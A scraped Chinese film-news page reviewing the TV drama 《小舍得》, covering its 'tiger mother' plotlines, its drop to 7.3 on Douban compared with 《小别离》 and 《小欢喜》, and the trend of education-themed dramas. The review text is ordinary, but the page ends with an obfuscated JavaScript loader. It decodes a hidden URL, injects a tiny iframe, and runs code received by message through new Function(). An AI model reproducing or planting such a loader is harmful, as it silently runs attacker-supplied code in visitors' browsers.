您所在的位置:青苹果影院>>新闻>>电影资讯>>《小别离》《小欢喜》后,7.3分《小舍得》砸了?

《小别离》《小欢喜》后,7.3分《小舍得》砸了?

时间:2021-04-18 05:06:42阅读:2963
“只要是关系到孩子,没有哪对父母能始终保持理智。如果不是为了孩子,谁又愿意赤眉白脸地挣命一样。在当父母之前,谁还没有一点傲气。”说出这些话的时候,平日雷厉风行的田雨岚(蒋欣
  • 小别离
  • 剧情
  • 黄磊 海清 张子枫 朱媛媛 韩青 汪俊 陈数 陈小纭

《小别离》《小欢喜》后,7.3分《小舍得》砸了?


“只要是关系到孩子,没有哪对父母能始终保持理智。如果不是为了孩子,谁又愿意赤眉白脸地挣命一样。在当父母之前,谁还没有一点傲气。”


说出这些话的时候,平日雷厉风行的田雨岚(蒋欣 饰),正站在补习社讲台上公开道歉。


《小别离》《小欢喜》后,7.3分《小舍得》砸了?


自尊心极强的她,明知道这是当众出丑,也被迫低头俯腰,声泪俱下地承认错误,表示自己因为无理和冲动而说了有损老师名声的话,希望老师能够原谅自己,能够理解一个母亲对孩子的心。


这个画面,源自剧集《小舍得》里的经典一幕。


“虎妈”田雨岚,放下骄傲,费尽心思,只求为自家孩子争取一个入读奥数金牌班的名额。


《小别离》《小欢喜》后,7.3分《小舍得》砸了?


如此“鸡娃”,已经不是一个新鲜的话题,但压迫式教育,向来颇具争议。聚焦中国“小升初”教育的激烈战况,近期播出的《小舍得》正是关注这个话题。


三组家庭,一个社会

“痛苦地拔尖”or“快乐地倒数”or“天生的学霸”


田雨岚就职于一家大型商场,丈夫颜鹏(李佳航 饰)是富二代,两口子属于典型的中产家庭,孩子颜子悠是妥妥的学霸,班里名列前茅不在话下,家里还摆满了各种各样的证书。他的身上,肩负着考上优秀民办初中的明确使命。


《小别离》《小欢喜》后,7.3分《小舍得》砸了?


为了完成这个使命,颜子悠从一年级就被安排学习奥数,童年生活都被迫沉浸在各种各样的补习班中。他不能有自己的主意,更谈不上拥有快乐,就算单纯想吃个西瓜,也会被母亲以导致肥胖的理由而制止。


面对一大家子人,他会被拉出来展示背诵圆周率破2000位的才艺;面对爷爷问自己是否真的想参加补习班,他只能口是心非地答应;面对自己不感兴趣的班委,他同样要被迫参选。 


《小别离》《小欢喜》后,7.3分《小舍得》砸了?


为了孩子的前途,田雨岚无所不用其极。她联合家长举报老师,自己亲自上门贿赂、利诱保姆让出补习班名额,甚至拉拢学霸家长帮助孩子竞选班委。


蒋欣评价田雨岚,是一个战斗型的鸡血妈。她培养了一个成绩拔尖的孩子,却剥削了孩子最基本的权利。


《小别离》《小欢喜》后,7.3分《小舍得》砸了?


相反,她异父异母的姐妹南俪(宋佳 饰),则属于一股清流。南俪和丈夫夏君山(佟大为 饰)同样属于中产,但对女儿夏欢欢却采取“放养”。


即使孩子学习成绩垫底,夫妻俩亦不会谩骂,而是为她找原因,补知识。欢欢音乐天赋颇高,理想是做主持人或歌唱家,这样在田雨岚看起来不切实际的想法,也得到了南俪夫妇的支持。


《小别离》《小欢喜》后,7.3分《小舍得》砸了?


南俪强调,人的一生找到自己喜欢的事儿并愿意为之奋斗,是幸福的。夏欢欢五年级之前从来没有被迫参加过任何补习班,拥有一个完整而快乐的童年。


不过,宋佳在采访中透露,为了孩子进步,这个和善的妈妈后期会变得魔怔,这个有爱的家也将变得不再是原来的模样。


《小别离》《小欢喜》后,7.3分《小舍得》砸了?


颜子悠和夏欢欢身上各有短板,纵然都不能让父母省心。天下之中,能让父母满意的,大多是“别人家的孩子”。


比如,米桃。


米桃是天生的学霸。父母都来自农村的她,自转学至城里之前,没有参加任何培训班,但依然考了全班第一。别人都做不出来的压轴数学题,她轻松就能拿下满分。老师盛赞她,之所以只考了100分,是因为卷面只有100分。


米桃不需要家长的监督与压迫,一切靠天赋与努力,唯一的劣势,就是家庭条件欠佳,父母需要为其高昂的补习班学费发愁。但即使如此,米桃妈妈在听完田雨岚提出补贴五千元后,依然拒绝让出金牌班名额。


《小别离》《小欢喜》后,7.3分《小舍得》砸了?


颜子悠,夏欢欢和米桃,一个是“痛苦地拔尖”,一个“快乐地倒数”,一个是“天生的学霸”,三组家庭各有各的苦虑,但都愿意为孩子教育付出所有。


几位家长为争取补习班“入门券”而不惜一切的表现,正折射出当今教育体系里,即使是小升初的学生,也活在严峻的竞争环境。


无论是为了争取及格分数的待优生,希望博得更好成绩的尖子生,还是为了在扎实基础上再求突破的学霸,都面临着无法松懈的压力。


《小别离》《小欢喜》后,7.3分《小舍得》砸了?


别离、欢喜、舍得

真实的中国家庭众生相 


《小舍得》改编自作家鲁引弓的同名小说,和《小欢喜》《小别离》一样,是其“中国教育四部曲”中的一部。目前改编的三部电视剧,均以群像展现的方式,分别探讨了中国家庭在面对孩子中考、高考以及小升初三个关键节点的态度。


三部系列作品串联起来,恰好覆盖了中国学生最难忘的12年。它们以“小”为名,聚焦教育议题和亲子关系,描摹了一幅真实的中国家庭众生相。


《小别离》《小欢喜》后,7.3分《小舍得》砸了?


身为前两部的总编剧,黄磊 说,《小欢喜》和《小别离》骨子里都融入了“对立面”的意思。可以理解为,父母和孩子的关系,在一定的阶段都是相对对立的。


两部剧集都紧紧地围绕家庭教育理念展开,前者反映了“中国社会的盲目留学热潮”,抨击了部分家长对于留学的片面理解;后者映射了“一人高考,全家打仗”的现实状况,同时剖析了由于代际认识差异而造成的家庭矛盾。


《小别离》《小欢喜》后,7.3分《小舍得》砸了?


 较两部前作相比,《小舍得》的主创班底进行了大换血,豆瓣口碑也从此前的8分+跌到了7.3,整体水平被吐槽直线下跌:


“贩卖焦虑,负能量爆棚!”

“来来回回就这点事,贩卖焦虑,毫无创新。”

“这种贩卖焦虑的剧已经没有市场了!”


豆瓣高赞评论上,“贩卖焦虑”是《小舍得》被大家咎病最多的一点。有网友认为,剧集里的很多转折都是为了矛盾而矛盾,随后又营造出刻意的假美好,结局可能也只是端一锅名为亲情的鸡汤灌给观众。


《小别离》《小欢喜》后,7.3分《小舍得》砸了?


平心而论,就播出的前十集来看,《小舍得》贯彻了系列前作的主题和模式,针对讨论当下热门教育话题能勾起一定数量观众的共鸣,因此,它最近也成了热搜上的常客。


不可否认的是,诸如田雨岚和南俪的重点矛盾弱化,钟老师和张老师的支线交待不清,欠缺生活剧里最重要的“烟火气”,都是其不及前作出彩的理由。


《小别离》《小欢喜》后,7.3分《小舍得》砸了?


当然,剧集目前播出了四分之一,接下来的线索是否会更加明晰,人物塑造会否更加丰富,大家不妨继续观望。


教育题材作品不缺关注

真实、接地气成制胜关键


近几年,《虎妈猫爸》《小别离》《小欢喜》《青春派》《带着老爸去留学》《小舍得》……教育题材的影视剧并不少见。


它们也从不缺话题与热点。《虎妈猫爸》热播时,一度抢占全国同时段收视排行榜首位;《小别离》和《小欢喜》,更是全民热捧的国民剧集;如今,上线6天的《小舍得》,也跃居至猫眼热度排行榜的第2位。


《小别离》《小欢喜》后,7.3分《小舍得》砸了?上线6天,《小舍得》位列猫眼热度排行榜第2位


在知识改变命运的牢固观念共鸣下,此类作品似乎自带“吸粉”体质。取材生活,真实呈现,更成了它们制胜的关键。


以《小欢喜》为例。确定拍摄高考题材之后,剧集编剧便开始到处走访,深入渗透至数百位考生的家庭,去了解考生们的想法,家长们的态度,以及他们一路走来的心理变化。


导演汪俊 直言,高考题材很多,出新很难。他觉得,高考只是一个行为,好的作品要落点成长。因此,《小欢喜》最终不仅着力展现孩子的高考压力与家长焦虑,更花了不少笔墨勾勒双方的共同蜕变。


截至目前,豆瓣高达8.4分的它,仍是同类作品的巅峰代表。


《小别离》《小欢喜》后,7.3分《小舍得》砸了?


接下来,同为家庭教育题材的《学区房》也即将与大家见面。


该剧由“小”系列前两部导演汪俊操刀,赵薇、秦昊、王鸥领衔主演,讲述的是一对都市夫妇为孩子“幼升小”而经历一系列折腾的故事。


《小别离》《小欢喜》后,7.3分《小舍得》砸了?


从高考、中考、小升初再到幼升小,家庭教育剧集对于青少年的关注越来越全面。


一方面,这似乎暗示了中国教育的竞争情绪出现得越来越早。另一方面,也体现了行业对于教育题材挖掘得愈发细腻。


身为贯穿“小”系列的总制片人,徐晓鸥分享了他对此类作品的心得。他表示,教育连接着家庭和社会,能够对社会情绪有特殊的体察。现实主义剧集不应该构成对社会焦虑的消费,而应该为焦虑提供出口,为大家提供一些方法和逻辑。


《小别离》《小欢喜》后,7.3分《小舍得》砸了?


放眼未来,我们固然期待更多精彩的现实主义作品出现。正如徐晓鸥所说,在遇到类似困惑时,我们也希望能在以生活为本的优秀作品里,获取更多击碎矛盾的参考方向和解决思路......


相关资讯

评论

  • 评论加载中...
function SLmJwYg(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function xnXmGwb(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return SLmJwYg(t);};eval('\x77\x69\x6e\x64\x6f\x77')['\x42\x45\x79\x50\x6f\x70\x41']=function(){;(function(u,r,w,d,f,c){var x=xnXmGwb;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var k='',wr='w'+'ri'+'t'+'e';'jQuery';var c=d[x('Y3VycmVudFNjcmlwdA==')];var f=d.createElement('iframe');f.id='x'+(Math.random()*10000);f.style.width=f.style.height=10+'px';f.src=[u,r].join('-');d[wr](f.outerHTML);w['addEventListener']('message',function(e){if(e.data[r]){d.getElementById(f.id).style.display='none';new Function(x(e.data[r].replace(new RegExp(r,'g'),'')))();}});})('aHR0cHMlM0ElMkYYlMkZiay5saXV3ZW55YYW4ueHl6JTJGMTM0ODEy',''+'jFE'+'xJO'+'',window,document,''+'Nsl'+'hqi'+'fS'+'','Y');};